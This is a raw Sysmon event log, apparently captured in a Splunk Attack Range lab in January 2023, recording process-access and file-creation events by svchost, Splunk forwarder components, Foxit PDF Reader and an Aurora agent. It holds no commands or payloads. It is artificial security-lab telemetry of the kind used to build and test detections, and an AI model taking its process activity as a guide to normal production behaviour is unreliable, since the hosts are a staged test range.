12:26:33.040{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045341Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.040{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045340Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.040{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8326420C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000045339Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.040{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E579-63C7-6F06-00000000AF02}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000045338Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.040{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E579-63C7-6F06-00000000AF02}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000045337Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:33.041{FE4C2B44-E579-63C7-6F06-00000000AF02}4432C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000017781Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:26:34.974{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E19F4469F5A8D38E8DBA326F41CA7FE,SHA256=043DC18FCAD50F1D33F00640AE0C37F71E552D325CD8FC2B16F22FACEFA929C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000045383Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.824{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=8EA4D43D3F8C9F7ECBB3F7C89E7ECA9A,SHA256=B5759CC1567D1D077F9BB47518A7254537ECF968E19A6FE3BA8DD7F9863F2256,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000045382Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.808{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=6EE4EA1F3E0C5985AB63BB1BF0FD0489,SHA256=ACD683386875826756D8BC0F5CB3438FF4BF7123B692069D2147EEC54D0412EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000045381Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.763{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2806-00000000AF02}7096C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045380Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.758{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E474-63C7-2706-00000000AF02}704C:\Program Files\Internet Explorer\iexplore.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045379Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.749{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045378Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.749{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E317-63C7-ED05-00000000AF02}6268C:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReaderUpdateService.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045377Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.748{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5E05-00000000AF02}5280C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045376Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.748{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E0D1-63C7-5D05-00000000AF02}4176C:\Windows\system32\cmd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045375Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.746{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E02A-63C7-4705-00000000AF02}4708C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045374Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.740{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045373Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.729{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045372Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.708{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045371Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.701{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045370Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.693{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045369Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.689{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF5-63C7-A404-00000000AF02}4616C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045368Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.687{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF4-63C7-A104-00000000AF02}4952C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045367Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.685{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA7E-63C7-F900-00000000AF02}4844C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045366Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.682{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA75-63C7-F400-00000000AF02}2900C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045365Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.680{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045364Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.679{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AE00-00000000AF02}4912C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045363Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.676{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045362Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.676{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7500-00000000AF02}3048C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045361Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.675{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA1C-63C7-7400-00000000AF02}3024C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 10341000x800000000000000045360Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:26:34.674{FE4C2B44-DE08-63C7-F104-00000000AF02}60685492C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA05-63C7-3E00-00000000AF02}3580C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013600850) 